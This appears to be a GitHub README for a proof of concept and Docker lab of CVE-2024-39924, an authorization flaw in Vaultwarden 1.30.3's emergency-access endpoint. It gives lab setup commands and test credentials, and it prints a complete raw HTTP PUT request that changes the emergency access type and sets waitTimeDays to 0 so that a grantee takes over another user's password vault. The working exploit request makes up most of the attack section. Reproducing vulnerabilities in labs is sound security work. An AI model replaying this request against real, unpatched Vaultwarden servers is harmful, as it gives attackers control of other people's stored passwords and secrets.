# PoC-CVE-2024-39924
PoC and lab setup for CVE-2024-39924

## Description

An issue was discovered in Vaultwarden (formerly Bitwarden_RS) 1.30.3. A vulnerability has been identified in the authentication and authorization process of the endpoint responsible for altering the metadata of an emergency access. It permits an attacker with granted emergency access to escalate their privileges by changing the access level and modifying the wait time. Consequently, the attacker can gain full control over the vault (when only intended to have read access) while bypassing the necessary wait period.

## Lab Setup

Just build the docker image and run it:

````
# download repo
git clone https://github.com/l4rm4nd/PoC-CVE-2024-39924 && cd PoC-CVE-2024-39924

# build docker image
docker build -t CVE-2024-39924 .

# run docker image
docker run --rm --name CVE-2024-39924 -p 443:80 CVE-2024-39924
````

Then browse https://127.0.0.1 and pwn.

## Credentials

Two user accounts were configured within Vaultwarden.

- Susan with the e-mail address `susan@wulport.com`
- Robert with the e-mail address `robert@wulport.com`

Susan was configured as emergency contact for Robert. Robert chose an approval time of 90 days, which Susan wants to bypass.

You can login as Susan with the following creds:

````
Username: susan@wulport.com
Password: Emission-darkened8-tr4itor
````

## Exploitation

https://www.mgm-sp.com/cve/missing-authentication-check-for-emergency-access

Issue a PUT request to the API endpoint `/api/emergency-access/<UUID>` and manipulate the JSON key `waitTimeDays` to the value `0`. After 1 minute, a cronjob will provide Susan access to Robert's vault.

>[!CAUTION]
> The cron interval was adjusted to make this PoC usable.
>
> The [default configuration](https://github.com/dani-garcia/vaultwarden/blob/51a1d641c5924779ac35fa69ae0eeb3369c1c6b7/.env.template#L160-L161) of Vaultwarden runs `EMERGENCY_REQUEST_TIMEOUT_SCHEDULE` hourly. So a real attacker would likely have to wait at least 1 hour to gain access to another person's vault.

<details>

````
PUT /api/emergency-access/127ed2a7-9225-499e-a6a7-70e96313a5db HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/
authorization: Bearer <redacted>
device-type: 10
Cache-Control: no-store
Pragma: no-cache
Bitwarden-Client-Name: web
Bitwarden-Client-Version: 2024.1.2
Connection: keep-alive
Cookie: <redacted>


{"email":"susan@wulport.com","type":0,"waitTimeDays":0,"Status":4}
````
</details>
